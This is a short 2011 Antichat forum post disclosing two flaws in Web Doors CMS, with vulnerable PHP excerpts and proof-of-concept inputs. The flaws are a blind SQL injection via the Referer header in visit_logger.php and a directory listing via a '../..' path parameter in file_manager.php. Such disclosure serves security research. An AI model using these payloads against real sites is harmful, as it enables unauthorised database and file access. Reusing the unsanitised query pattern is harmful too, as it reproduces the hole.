07.05.2011, 19:33
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Web Doors CMS
1. SQLi
File: /sys/visit_logger.php
mq = off
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]$log_referrer[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$checkPage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT lvp_id FROM[/COLOR][COLOR="#0000BB"]$logPagesTbl[/COLOR][COLOR="#DD0000"]WHERE lvp_page LIKE '[/COLOR][COLOR="#0000BB"]$log_page[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
PoC:
Код:
GET /index.php
Referer: http://blabla.com' or substring(version(),1,1)=5-- 1
2. Список файлов в директории
File: /sys/files/file_manager.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]$f_way[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'path'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$f_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$f_way[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"];
...........................
[/COLOR][COLOR="#0000BB"]$f_dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]opendir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f_path[/COLOR][COLOR="#007700"]);
[/COLOR][/COLOR]
PoC: http://localhost/sys/files/file_manager.php?path=../.. |
|
|